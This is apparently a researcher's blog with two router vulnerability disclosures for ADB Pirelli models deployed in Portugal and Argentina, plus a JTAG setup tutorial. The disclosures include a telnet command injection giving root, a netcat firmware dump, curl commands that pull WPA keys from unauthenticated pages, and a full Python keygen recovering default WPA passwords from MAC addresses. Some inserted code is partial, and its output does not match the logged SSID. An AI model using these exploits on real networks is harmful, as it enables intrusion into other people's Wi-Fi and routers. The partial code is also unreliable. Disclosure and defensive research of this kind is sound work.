Hacking again Pirelli routers: ADB Pirelli P.DG A4000N deployed by MEO Portugal

Thursday, 7 May 2015 No comments


Sticker at the bottom of routers


A few months after the full disclosure of CVE-2015-0558, I was contacted by our reader Kara Davis, who had identified the same WPA key generation algorithm in the model P.DG A4000N, distributed by the Portuguese ISP MEO. These routers can be recognised by their ESSID and MAC addresses: the ESSIDs normally follow the pattern ADSLPT-ABXXXXX and the MAC addresses correspond to the Pirelli vendor prefix. After verifying the information, I took the chance to dump the firmware and see whether the old vulnerabilities (CVE-2015-0554, CVE-2015-0558) were also present. From testing and evidence we concluded that the existing PoC could also generate the default WPA password for this model. Only small changes were needed: deriving the key from a different interface's MAC address and reducing the key length from 10 to 8 characters. The algorithm itself was evidently the same as in the P.DG A4001N distributed by Arnet in Argentina. Kara Davis and I agreed on a responsible disclosure and decided to investigate further.

First of all, we dumped the firmware image from the router via an OS command injection in the telnet service. Once we had done so, the same algorithm was found inside it, and on top of that the same unauthorised access issue was present as well. This router likely has plenty of other vulnerabilities too; we simply decided to stop with this model.


Summarising, the router P.DG A4000N deployed by MEO Portugal presents the following flaws:

  1. Weaknesses in the default WPA key generation algorithm
  2. OS command injection through the telnet service, ending with root on the box
  3. Unauthorised access to almost all of the HTML pages


Identifying hardware components

Discovering the hardware. UART'ing the board


Digging into the hardware components can be really useful to gather information about our target. Before we try to extract memory contents or JTAG the device, we have to know its characteristics and which attack points we actually have. Debugging interfaces such as UART or JTAG are common in many embedded devices: the majority of routers have a UART port and, depending on the SoC, also a JTAG port.

Unfortunately, our target only has a UART port. After hooking some cables up to the UART pins, we are able to find out how the OS and the booting process work. For instance, when we "UART" a device, we first try to get a shell or command-line environment. Moreover, we can collect useful information such as the names of the flash memories the firmware could be stored in, the base address the OS is loaded at, which CPU (SoC) we are dealing with, what WiFi module the device contains, and so on. Zooming into the picture, the reader will recognise the main components of this router. The most important ones are the SoC, the flash and the debugging interfaces. The System-on-Chip (SoC) is a Broadcom BCM6328. The flash is a Macronix MX25L12845EMI-10G, which can be read out in-circuit, without desoldering, with any decent EEPROM programmer. Fortunately, another flaw allowed me to dump the whole firmware image much faster and more easily.

The most relevant lines from the booting process are shown below:

CFE version 1.0.37-106.24 for A4001N TEF 0001 BCM96328 (32bit,SP,BE)
Build Date: mar set  6 12:27:14 CEST 2011 (marcodl@localhost)
Copyright (C) 2000-2009 Broadcom Corporation.
HS Serial flash device: name MX25L128, id 0xc218 size 16384KB
Total Flash size: 16384K with 4096 sectors
Chip ID: BCM6328B0, MIPS: 320MHz, DDR: 320MHz, Bus: 160MHz
Total Memory: 33554432 bytes (32MB)
Boot Address: 0xb8000000
Board IP address                  :
Run from flash/host (f/h)         : f
Default host run file name        : vmlinux
Default host flash file name      : bcm963xx_fs_kernel
Board Id (0-4)                    : 963281TAN
Base MAC Address                  : 84:26:15:ae:bc:13
PSI Size (1-64) KBytes            : 64
Enable Backup PSI [0|1]           : 0
System Log Size (0-256) KBytes    : 0
Main Thread Number [0|1]          : 0
*** Press any key to stop auto run (1 seconds) ***
Auto run second count down: 0
Booting from only image (0xb8010000) ...
Code Address: 0x80010000, Entry Address: 0x80014230
Decompression OK!
Entry at 0x80014230
Starting program at 0x80014230
Linux version 2.6.30 (cx1giordan@thor) (gcc version 4.4.2 (Buildroot 2010.02-git
) ) #1 Mon Jan 21 17:14:53 CET 2013
HS Serial flash device: name MX25L128, id 0xc218 size 16384KB
kerSysEarlyFlashInit: bootCfeVersion has value cfe-A4001N-V0001
963281TAN prom init
CPU revision is: 0002a075 (Broadcom4350)
Determined physical RAM map:
 memory: 01f00000 @ 00000000 (usable)
Zone PFN ranges:
  DMA      0x00000000 -> 0x00001000
  Normal   0x00001000 -> 0x00001f00
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
    0: 0x00000000 -> 0x00001f00
Kernel command line: root=31:0 ro noinitrd console=ttyS0,115200
Serial: BCM63XX driver $Revision: 3.00 $
ttyS0 at MMIO 0xb0000100 (irq = 36) is a BCM63XX
ttyS1 at MMIO 0xb0000120 (irq = 47) is a BCM63XX
bcmxtmrt: Broadcom BCM6328B0 ATM/PTM Network Device 
init started:  BusyBox v1.00 (2013.01.21-16:17+0000) multi-call binary
BusyBox v1.00 (2013.01.21-16:17+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
===== Release Version PDGA4000N_PT_4.06L.2.2828 (build timestamp 130205_1145) ==
SerialNumber: 47502E0021746
WPA Key: 78leqnej
WPS Device PIN = 14258671
Setting SSID: "ADSLPT-AB37495"
BCM96328 Broadband Router


For further information on the booting process through the UART port, see the full boot log: bootlog_pirelli_portugal.

For further information on the SoC: bcm63xx. Besides, some useful information about a similar device: ADB P.DG A4001N1.


Extracting the firmware image via OS command injection

Same old, same old command  injection


The router ships with telnet enabled by default and the usual admin credentials, although it presents a constrained shell where not much can be done. Looking into the available commands we did not find much help, so I decided to try some simple command injection and within seconds I was in the BusyBox ash shell. Once we had root rights, we noticed that netcat was available on the OS. With netcat and root at hand, we easily transferred the mtdblock which stores a backup of the firmware image: a simple combination of cat and netcat dumps the firmware to our box. At this point the firmware is exposed and the mtdblocks and libraries are completely accessible for firmware analysis. Any router based on the BCM96328 could be affected too, as well as many other Broadcom-based ones. Security in routers is indeed quite poor.

To dump the firmware, open up several shells. From the router:

$ telnet
> ping a; sh
# cat /dev/mtdblock1 | ncat -l -p 6666

From our box:

$ nc 6666 > me0firmware.bin

The firmware image can be found in the new repository dedicated exclusively to firmware images deployed by international ISPs. Please help us!


Default WPA key generation algorithm

Since I already explained this point in my last entry, it would be repetitive to explain it again; please take a look at that entry. Once the firmware image has been unpacked with Binwalk, we can load some libraries and binaries into IDA Pro. ESSID generation is seen right before the WPA keys are generated. Clearly the ESSID is generated from the MAC address, just as the WPA key is. Take a look at the highlighted lines in the MIPS assembly code below and you will see how the MAC address is involved in both.

addiu   $v0, $fp, 0x30+var_10
lw      $a0, 0x30+arg_0($fp)
la      $v1, 0xC0000
addiu   $a1, $v1, (aWl0 - 0xC0000)  # "wl0"
move    $a2, $v0
la      $v0, wlmngr_getPBSHwAddr
move    $t9, $v0
jalr    $t9 ; wlmngr_getPBSHwAddr
lw      $gp, 0x30+var_20($fp)
lbu     $v0, 0x30+var_E($fp)
andi    $v0, 0xF
sll     $v1, $v0, 24
lbu     $v0, 0x30+var_D($fp)
sll     $v0, 16
or      $v1, $v0
lbu     $v0, 0x30+var_C($fp)
sll     $v0, 8
or      $v1, $v0
lbu     $v0, 0x30+var_B($fp)
or      $v1, $v0
li      $v0, 0x14F8B589
mult    $v1, $v0
mflo    $a1
mfhi    $a0
sra     $a0, 13
sra     $v0, $v1, 31
subu    $v0, $a0, $v0
la      $a0, loc_186A0
mul     $v0, $a0
subu    $v0, $v1, $v0
move    $v1, $v0
lw      $v0, 0x30+var_18($fp)
addu    $v0, $v1, $v0
sw      $v0, 0x30+var_14($fp)
la      $v0, 0xC0000
addiu   $v0, (aAdslptAb05d - 0xC0000)  # "ADSLPT-AB%05d"
lw      $a0, 0x30+arg_4($fp)
move    $a1, $v0
lw      $a2, 0x30+var_14($fp)
la      $v0, sprintf
move    $t9, $v0
jalr    $t9 ; sprintf
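The arithmetic in the listing above, re-executed in Python as an added example (this is not the author's code nor the router's firmware). The compiler turned a signed division by 100000 into the multiply by 0x14F8B589 followed by mfhi and sra 13, and IDA shows the divisor immediate 0x186A0 (100000) as the bogus label loc_186A0; the code below reproduces that sequence bit for bit, then the modulo and the sprintf formatting. The value loaded from var_18 is not visible in the listing, so it is taken as an assumed parameter (offset); for the base MAC in the boot log above the remainder is 37491, while the logged SSID is ADSLPT-AB37495, so a small constant, or the exact MAC that wlmngr_getPBSHwAddr("wl0") returns, accounts for the difference.

```python
MAGIC   = 0x14F8B589   # li $v0, 0x14F8B589: magic multiplier for "/ 100000"
DIVISOR = 0x186A0      # 100000; IDA renders this immediate as "loc_186A0"


def to_s32(x):
    """Wrap an integer to a signed 32-bit value, as held in a MIPS register."""
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x & 0x80000000 else x


def c_div(a, b):
    """C-style integer division (truncation toward zero), used as the oracle."""
    q = abs(a) // abs(b)
    return q if (a >= 0) == (b > 0) else -q


def mips_div_100000(v1):
    """Re-execute the mult / mfhi / sra / subu sequence from the listing.

    This is gcc's signed division by a constant: the high word of the 64-bit
    product is shifted right, then sign(v1) (0 or -1) is subtracted so the
    result truncates toward zero exactly like a C 'v1 / 100000'."""
    v1 = to_s32(v1)
    product = v1 * MAGIC          # mult $v1, $v0   (64-bit signed product)
    hi = to_s32(product >> 32)    # mfhi $a0
    q = hi >> 13                  # sra  $a0, 13    (arithmetic shift)
    q -= (v1 >> 31)               # sra $v0, $v1, 31 ; subu $v0, $a0, $v0
    return q


def mips_mod_100000(v1):
    """mul $v0, $a0 ; subu $v0, $v1, $v0  ->  v1 - (v1 / 100000) * 100000."""
    return to_s32(v1) - mips_div_100000(v1) * DIVISOR


def essid_number(mac, offset):
    """Build the 5-digit number of "ADSLPT-AB%05d" the way the listing does.

    The four lbu loads read MAC bytes 2..5 (var_E..var_B of the buffer at
    var_10); the high nibble of byte 2 is masked by 'andi 0xF', so only the
    low 28 bits of the MAC take part. 'offset' stands for the value read from
    var_18, which the listing does not show (assumption: a small constant)."""
    b = bytearray(mac)
    v1 = ((b[2] & 0xF) << 24) | (b[3] << 16) | (b[4] << 8) | b[5]
    return mips_mod_100000(v1) + offset


def essid(mac_str, offset=0):
    """Format the ESSID exactly as sprintf(buf, "ADSLPT-AB%05d", n) would."""
    mac = bytearray.fromhex(mac_str.replace(':', '').replace('-', ''))
    return 'ADSLPT-AB%05d' % essid_number(mac, offset)


if __name__ == '__main__':
    # Base MAC taken from the boot log quoted in this post.
    print(essid('84:26:15:ae:bc:13'))   # ADSLPT-AB37491 (offset 0)
    # The strength-reduced sequence must agree with plain C division for the
    # whole signed 32-bit range, negatives included (truncation toward zero).
    for v in (0, 99999, 100000, 95337491, (1 << 28) - 1, -1, -250000, -2147483648):
        assert mips_div_100000(v) == c_div(v, DIVISOR)
```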

The rest does not need to be explained again. To sum up, WPA keys are easily recovered by an adversary, as I explained in the last entry.


Unauthorized access via HTTP

While we were checking the previous problems one by one against other Pirelli routers, we quickly checked whether WAN access was enabled by default, as happened in CVE-2015-0554. To remind readers: in both Spain and Argentina the WAN interface was enabled, leaving the routers vulnerable from the outside. In Portugal, (un)fortunately, WAN access was completely disabled by default. At this point we can only conclude that either our firmware version has it disabled or all versions do. This vulnerability can only be exploited from within the internal network (LAN). The author has not been able to exploit the router remotely with version FW: PT_4.06L.2.2020, HW: R01.


Problems and models affected

I wanted to do a responsible disclosure, so I contacted the Portuguese ISP MEO and was surprised by a quick reply via Twitter indicating that I should forward the details to a specific person, which I did immediately. Unfortunately, since that day I am still waiting for a reply. ADB/Pirelli and Arnet have been aware of the vulnerability since 2014. Eventually I decided to do full disclosure for the newly identified model, to speed up fixing the problem and/or replacing the affected routers in order to avoid intrusions. Once again, neither the ISPs nor the manufacturer have shown interest in discussing the problem after several contacts.

The vulnerability is considered quite serious: a malicious attacker within WiFi range can calculate the default password, gain access to the network, compromise it and use it for malicious purposes.

I strongly recommend that everyone using affected units immediately change their default WPA password.
The models identified as vulnerable are:

  • P.DG A4001N – SSID: Wifi-Arnet-XXXX – Arnet Argentina
  • P.DG A4000N – SSID: ADSLPT-ABXXXXX – MEO Portugal

More countries will be disclosed soon. Pirelli has made the same mistake around the world.



2015-04-01  Confirmed that the Portuguese ISP "MEO" uses the same algorithm
2015-04-05  Sent a message to @MEOpt via Twitter @enovella_
2015-04-05  I got a response in a matter of minutes \o/
2015-04-05  I sent an email to luis-oliveira-cc@telecom.pt, stating the reference 3-78405621289 in the email subject
2015-05-07  Full disclosure



This proof-of-concept and many Pirelli default key generation algorithms can be found in my Bitbucket repository. Looking at the first picture of this entry, the reader can check that the WPA keys can be recovered in a matter of seconds for any router with default settings. Checking the MAC address on the sticker attached to the router, an adversary would have to tweak the LAN MAC address into the WLAN MAC address, which is public: the difference is just minus one (-1). Both the Pirelli Arnet and MEO cases have been combined in the same program. From now on, the Python script called pirelli.py will be responsible for generating such WPA keys.

Disclaimer: Be ethical! I am not responsible for what you do with this script  :)

$ python pirelli.py  -b 84:26:15:ae:bc:14
[+] MAC     : 84:26:15:ae:bc:14
[+] WPA key : 78leqnejoj	SSID: WiFi-Arnet-XXXX (Argentina)
[+] WPA key : 78leqnej  	SSID: ADSLPT-ABXXXXX  (Portugal)


Please Pirelli, if you read this, please contact me. You would make me quite happy with some Pirelli tyres for my racing bike :)

CVE-2015-0558: Reverse-engineering the default WPA key generation algorithm for Pirelli routers in Argentina

Monday, 5 January 2015 8 comments



Sticker with default settings

A couple of years ago, if I remember correctly, I was also reverse engineering some Spanish routers deployed by Pirelli. After I extracted the firmware and found a suspicious library with many references to key generation functions, everything seemed done. Unfortunately, I could not recover the algorithm itself, mainly because those routers were not using the same algorithm for generating default keys and simply because the algorithm was not explicitly there. Shit happens! However, since I could not reveal the algorithm, I decided to try another way to recover the keys. Eventually, I realised that these routers were vulnerable to unauthorised and unauthenticated remote access, and any adversary could fetch HTML pages from our public IP address. Plenty of HTML pages could be downloaded without any restriction, which meant a huge leak and left the routers exposed to a bunch of evil attacks. This remote information disclosure can be seen in CVE-2015-0554. On the other hand, I do not know whether the Argentinian routers are also vulnerable to this issue. Feel free to try it out and let me know.

Just to show how easy it was to obtain those keys from the HomeStation (ESSIDs like WLAN_XXXX) in Spain, a simple curl command was enough:

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
                  <option value='0'>WLAN_DEAD</option>

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin    = '12820078';

Today I am going to explain how I reverse engineered a MIPS library in order to recover the default WPA key generation algorithm for some Argentinian routers deployed by Pirelli. Concretely, the affected router is the model P.DG-A4001N. First of all, I am neither Argentinian nor do I live there. Nevertheless, I accidentally came across some stickers from Pirelli routers in a random forum and, as a user had already published the firmware for those routers, I decided to give it a try. Since I still remembered the file I had dug into for the Spanish routers, I quickly tried to recover the algorithm in these routers. What follows is the path I took to achieve it.

Reverse-engineering the default key generation algorithm

In this section we are going to reverse engineer a MIPS library, /lib/private/libcms.core, found in the firmware itself. First of all, let me mention that the firmware was physically extracted by another user (fernando3k) and subsequently unpacked by me using Binwalk and firmware-mod-kit. Once it was mounted on our system, we found a function called generatekey. As you will see, symbols have not been stripped from the binaries and external function names are still there because of dynamic linking. This helps us a lot in our reverse engineering task. On top of that, we quickly saw that this function calls another one called generatekey_from_mac. At this moment I decided to take on this challenge. Before getting started, IDA Pro can help us with the cross references (Xrefs to/from in IDA Pro) between functions. Let's see how functions are called in the library. (Zoom the pictures in to see them properly.)


Call flow from generateKey





Really looking great! Now let's look at the cross references. We have figured out a few hints:

  1. generatekey calls generatekey_from_mac. This allows us to suppose that the MAC address is involved in the key generation algorithm. Besides, getPBSHwaddr returns a MAC address and it is also called by generatekey. This was verified after checking how getPBSHwaddr returns the value of /var/hwaddr ("ifconfig %s > /var/hwaddr").
  2. The SHA256 cryptographic hash function is also involved. We then know that our key comes from a well-known hash function. This way of generating WPA keys is very popular among some vendors because of the feeling of "randomness" it gives. Digging into this function will give us the main structure of our algorithm.
  3. The function createWPAPassphraseFromKey is called by wlWriteMdmDefault, which also calls generatekey. Hence we discover a function called bintoascii, which is basically responsible for converting binary to ASCII data.
  4. The SSID is also created from the MAC address, although it is not relevant for our task.


Call flow for createWPAPassphraseFromKey



Now we must dissect the generatekey_from_mac function and its SHA256 calls to figure out how many parameters are passed as input data. Before calling generatekey, the string "1236790" is passed to this function as its first argument ($a3). Nonetheless, we have to work out the right order for the SHA256 function, I mean how many updates there are. If we look at the picture below, we will see this step.



Disassembly of wlWriteMdmDefault



From generateKey_from_mac we realise that (look at the image below):

  1. The first argument is located at offset 0x000d29e0.
  2. The second argument is the string we discovered previously ("1236790").
  3. The third argument has to be the MAC address, because there is a load-immediate instruction with the value 6. Since a MAC address is 6 bytes long, we can try it out now.

Disassembly of generateKey_from_mac


As we know that the first argument is located at offset 0xd29e0, we just jump there and reveal the secret seed used in the SHA256. Now that we have guessed the first argument, we can prepare those 32 bytes in a byte array to generate the SHA256 hash later on. This secret seed has also been used by Pirelli in other countries such as Italy or Austria (look at the references in the source code for more info). Furthermore, right below it we can also distinguish the charset finally used to generate the keys.


Secret data found out in the library.



In the end, we conclude that the algorithm is as follows (the MAC address needs to be incremented by 1):




More details on how keys are eventually generated, in this Python function:

import hashlib

def genkey(mac):
    # 32-byte secret seed read from libcms.core at offset 0xd29e0. Only the
    # first 16 bytes survive on this page; the remaining 16 are elided here.
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
            '')  # placeholder: remaining 16 seed bytes are elided on this page
    lookup  = '0123456789abcdefghijklmnopqrstuvwxyz'
    sha256 = hashlib.sha256()
    # the three inputs are hashed in the argument order identified above:
    # seed, the constant "1236790", then the 6-byte MAC address
    sha256.update(seed)
    sha256.update('1236790')
    sha256.update(mac)

    digest = bytearray(sha256.digest())
    # each of the first 10 digest bytes selects one symbol of the 36-char charset
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])


Since I attempted to do a responsible disclosure and neither ADB Pirelli nor Arnet Argentina were interested in discussing the problem, I have finally decided to do full disclosure to speed up the fixing process. It looks like the only way with some vendors: just force them to replace the routers to avoid intrusions. Many things can happen if your router with SSID Wifi-Arnet-XXXX still has the default password. For your information, the default passwords are printed on a sticker at the bottom of the routers. If you own one of these networks, please change your password as soon as possible. You should always change default passwords anyway.

An adversary within WiFi range could access your network and commit any sort of fraud. Be safe and change the passwords right now!


2014-09-11  Found the algorithm
2014-09-12  Sent a message to @ArnetOnline via Twitter @enovella_
2014-09-15  Sent a message via website, still looking for a simple mail
2014-09-16  Sent another message to Arnet via website. First reply via Twitter, where they redirect me to the website form.
2014-09-19  Direct message via Twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20  More Twitter PMs about the same. They do not want to be aware of the problem, though.
2014-09-23  I assume that Arnet does not care about its clients' security at all, given its little interest.
2014-09-24  I sent the problem to the vendor ADB Pirelli via website form
2014-09-28  I sent the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05  Full disclosure


This proof-of-concept and many Pirelli default key generation algorithms can be found in my Bitbucket repository. I hope you can use them. A copy of the first version can also be seen below.

To install it, just make sure you have git installed on your system and then run:

$ git clone https://dudux@bitbucket.org/dudux/adbpirelli.git
$ cd adbpirelli && chmod +x *.py
$ python wifiarnet.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@license: GPLv3
@author : Eduardo Novella
@contact: ednolo[a]inf.upv.es
@twitter: @enovella_

[*] Target      :
Vendor           : ADB broadband Pirelli
Router           : Model P.DG-A4001N
ISP              : Arnet Telecom Argentina
Possible-targets : http://hwaddress.com/?q=ADB%20Broadband%20Italia
Firmware         : http://foro.seguridadwireless.net/puntos-de-acceso-routers-switchs-y-bridges/obtener-firmware-adb-p-dg-a4001n-%28arnet-telecom-argentina%29/

[*] References  :
[0] [AUSTRIA] A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness    http://sviehb.wordpress.com/2011/12/04/prg-eav4202n-default-wpa-key-algorithm/
[1] [ITALY]   Alice AGPF: The algorithm!                                            http://wifiresearchers.wordpress.com/2010/06/02/alice-agpf-lalgoritmo/
[2] [ARGENTINA] CVE-2015-0558: Reverse-engineering the default WPA key generation   http://ednolo.alumnos.upv.es/?p=1883
                algorithm for Pirelli routers in Argentina

[*] Test vectors :

[*] Acknowledgements  :
Thanks to fernando3k for giving me the firmware in order to do reverse-engineering on it, and christian32 for showing me a bunch of test vectors.

[*] Timeline    :
2014-09-11  Found the algorithm
2014-09-12  Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15  Send a message via website, still looking for a simple mail (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16  Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19  Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20  More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23  I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24  I send the problem to the vendor ADB Pirelli via website form
2014-09-28  I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05  Full disclosure and CVE-2015-0558 assigned

[*] TODO        :
1.- Reverse-engineering the function generateSSIDfromTheMac. It is not relevant though.
2.- Extract more firmwares from others vendors and send them to me.

[*] Changelog   :
2015-01-12   v1.2         Real bugfix for macaddress
2015-01-10   v1.1         --allKeys flag added  && bugfix with macaddress' jumps (thanks to Nicolás Chaves)
2014-09-11   v1.0         First PoC working
"""

import re
import sys
import hashlib
import argparse

VERSION     = 1
SUBVERSION  = 2             # v1.2, see the changelog above
DATEVERSION = '2015-01-12'
URL         = 'http://www.ednolo.alumnos.upv.es'

def genkey(mac, stdout=True):
    # 32-byte secret seed read from libcms.core at offset 0xd29e0. Only the
    # first 16 bytes survive on this page; the remaining 16 are elided here.
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
            '')  # placeholder: remaining 16 seed bytes are elided on this page
    lookup  = '0123456789abcdefghijklmnopqrstuvwxyz'
    sha256 = hashlib.sha256()
    # the three inputs are hashed in the argument order identified in the
    # write-up: seed, the constant "1236790", then the 6-byte MAC address
    sha256.update(seed)
    sha256.update('1236790')
    sha256.update(mac)

    digest = bytearray(sha256.digest())

    if stdout:
        print "[+] SHA256  : %s" % sha256.hexdigest()
    # each of the first 10 digest bytes selects one symbol of the 36-char charset
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])

def printTargets():
    print "[+] Possible vulnerable targets so far:"
    for t in targets:
        print ("\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX".format(t.upper()))


def checkTargets(bssid):
    # warn when the OUI is not one of the known Pirelli prefixes, but go on anyway
    supported = False
    for t in targets:
        if ( bssid.upper().startswith(t) ):
            supported = True
    if (not supported):
        print "[!] Your bssid looks like not supported! Generating anyway."

def addIncToMac(mac_str, inc):
    # return the 6-byte MAC that is 'inc' addresses away from mac_str
    try:
        mac = bytearray.fromhex('%012x' %(int(mac_str,16) + inc))
    except (ValueError, TypeError):
        sys.exit('[!] Use real input :)')
    return mac

def main():
    global targets
    version     = " {0:d}.{1:d}  [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL)
    # Pirelli OUI prefixes seen so far. The list is truncated on this page;
    # the repository version carries more entries.
    targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54']
    parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina. So far
                                                 only WiFi networks with essid like Wifi-Arnet-XXXX and manufactured by Pirelli are
                                                 likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
                                                 Twitter: @enovella_  and   email: ednolo[at]inf.upv.es''',
                                     epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0]))
    maingroup = parser.add_argument_group(title='required')
    maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version)
    command_group = parser.add_mutually_exclusive_group()
    command_group.add_argument('-l','--list', help='List all vulnerable targets (essid Wifi-Arnet-XXXX)', action='store_true')
    command_group.add_argument('-a','--allkeys', action="store_true",  help='Bruteforce mode')
    args = parser.parse_args()

    if args.list:
        printTargets()
    elif args.bssid:
        mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
        if len(mac_str) != 12:
            sys.exit('[!] Check MAC format!\n')
        checkTargets(args.bssid)
        print '[+] SSID    : WiFi-Arnet-XXXX'
        print '[+] MAC     : %s' % args.bssid

        if (args.allkeys):
            # the sticker shows the LAN MAC while the key derives from the WLAN
            # one, so also try the neighbouring addresses
            print '[+] WPA key :'
            for i in xrange(-2,5):
                mac = addIncToMac(mac_str,i)
                print '\t%16s' % (genkey(mac,False))
        else:
            print '[+] WPA key : %s' % (genkey((addIncToMac(mac_str,0)),False))
    else:
        parser.print_help()
        sys.exit('[!] Are you trying to crash me? :)')

if __name__ == "__main__":
    main()

Installing UrJTAG and Altera USB blaster JTAG on Linux Ubuntu 12.04

Thursday, 5 June 2014 No comments

Hey everyone, I have not been writing for a while due to my scarce spare time. Today I am going to talk about how to set up your box in order to debug embedded systems using JTAG. I will not describe it in detail because I am writing a paper on exactly that topic, and that paper will explain all this stuff in sufficient depth. However, you can get your really cheap JTAG adapter working on any Linux system by following the next steps. The great feature of these JTAG adapters is that they support the MIPS architecture, so we can extract firmware from many routers, modems and other embedded devices.

JTAG is an acronym for Joint Test Action Group. It is a serial-wire protocol dedicated to testing and recovering embedded hardware, and can be seen as a specialisation of the synchronous four-wire Serial Peripheral Interface (SPI). JTAG has a (slow) clock line (TCK), separate data-in (TDI) and data-out (TDO) lines, and a "test mode select" (TMS) line for controlling the state of the JTAG engine. TDI and TMS are clocked in on the rising edge of TCK, and TDO is clocked out on its falling edge. Sometimes there is also a test reset line (TRST). [1]

JTAGging a device requires a JTAG cable, although these days the "cable" is usually a programmer with its own on-board logic. Chinese clones of the popular Altera USB-Blaster JTAG programmer are inexpensive, costing under 7 euros. [1]

How to install your Altera USB-Blaster JTAG on Linux

First of all, we check which vendor ID our Altera blaster has:

$ lsusb 
Bus 001 Device 014: ID 09fb:6001 Altera 

After that, we must add a new udev rule so that our user-space tools can talk to the device through the kernel: [2] [3]

$ sudo vim /etc/udev/rules.d/altera-usb-blaster.rules
	ATTR{idVendor}=="09fb", ATTR{idProduct}=="6001", MODE="666"

Later on, we check how this change affected our system. Just unplug the USB JTAG and plug it in again.

$ sudo udevadm control --reload-rules
$ dmesg | tail
[472572.885351] usb 2-1.3: New USB device found, idVendor=09fb, idProduct=6001
[472572.885356] usb 2-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[472572.885360] usb 2-1.3: Product: USB-Blaster
[472572.885362] usb 2-1.3: Manufacturer: EPFL
[472572.885365] usb 2-1.3: SerialNumber: 00000000

Our USB-JTAG Altera blaster should now be ready to play with.

How to install Universal JTAG on Linux

Once our device is recognised by our box, we still need software to drive the JTAG device. Many JTAG adapters are based on the chip from "Future Technology Devices International" (FTDI) known as the FTDI FT2232. Our Altera USB-Blaster JTAG also shows up as an FTDI device, but it is not protocol-compatible with FT2232 devices; USB-Blaster devices are, however, protocol-compatible among themselves. They typically consist of an FT245 followed by a CPLD that understands a particular protocol, or emulate that protocol using some other hardware. [7] Before installing UrJTAG (the Universal JTAG library), some dependencies must be resolved:

$ sudo apt-get install libftdi-dev libusb-1.0-0 -y

We have three possible options to install UrJTAG.

Option 1 (Subversion revision #2041)

I highly recommend this option because you will get the latest updates to the framework. Actually, I have not played with it enough yet to verify whether trunk is more or less stable than the release.

$ svn checkout svn://svn.code.sf.net/p/urjtag/svn/trunk urjtag-svn
$ cd urjtag-svn/urjtag
$ sudo apt-get install autopoint gettext libtool -y
$ ./autogen.sh
$ ( ./configure done by autogen.sh; run it here with special options if needed )
$ make
$ make install

$ cd urjtag-svn/urjtag/src/apps/jtag
$ ./jtag
UrJTAG 0.10   2041
Copyright (C) 2002, 2003 ETC s.r.o.
Copyright (C) 2007, 2008, 2009 Kolja Waschk and the respective authors

UrJTAG is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
There is absolutely no warranty for UrJTAG.

warning: UrJTAG may damage your hardware!
Type "quit" to exit, "help" for help.


Option 2 (from SourceForge, release #1502)

If you definitely prefer stability because your hardware is already properly supported, then you can pick this option.

$ wget http://downloads.sourceforge.net/project/urjtag/urjtag/0.10/urjtag-0.10.tar.gz
$ tar zxvf urjtag-0.10.tar.gz
$ cd urjtag-0.10
$ ./configure

jtag is now configured for

  Detected libusb      : yes
  Detected libftdi     : yes
  Detected libftd2xx   : no
  Detected inpout32    : no
  Build SVF player     : yes
  Build BSDL subsystem : yes
  Bus drivers          : au1500 avr32 bcm1250 bf526_ezkit bf527_ezkit bf533_stamp bf533_ezkit bf537_stamp bf537_ezkit bf538f_ezkit bf548_ezkit bf561_ezkit bscoach ejtag ejtag_dma fjmem ixp425 jopcyc h7202 lh7a400 mpc5200 mpc824x ppc405ep ppc440gx_ebc8 prototype pxa2x0 pxa27x s3c4510 sa1110 sh7727 sh7750r sh7751r sharc_21065L slsup3 tx4925 zefant_xs3 
  Cable drivers        : arcom byteblaster dlc5 ea253 ei012 ft2232 igloo jlink keithkoep lattice mpcbdm triton usbblaster wiggler xpc 
  Lowlevel drivers     : direct ftdi ppdev 

$ make && sudo make install

$ cd ../src/

$ ./jtag 

UrJTAG 0.10 1502
Copyright (C) 2002, 2003 ETC s.r.o.
Copyright (C) 2007, 2008, 2009 Kolja Waschk and the respective authors

UrJTAG is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
There is absolutely no warranty for UrJTAG.

WARNING: UrJTAG may damage your hardware!
Type "quit" to exit, "help" for help.

jtag> cable Usbblaster
Connected to libftdi driver.
jtag> help
Command list:

quit          exit and terminate this session
help          display this help
frequency     setup JTAG frequency
cable         select JTAG cable
reset         reset JTAG chain
discovery     discovery of unknown parts in the JTAG chain
idcode        Read IDCODEs of all parts in a JTAG chain
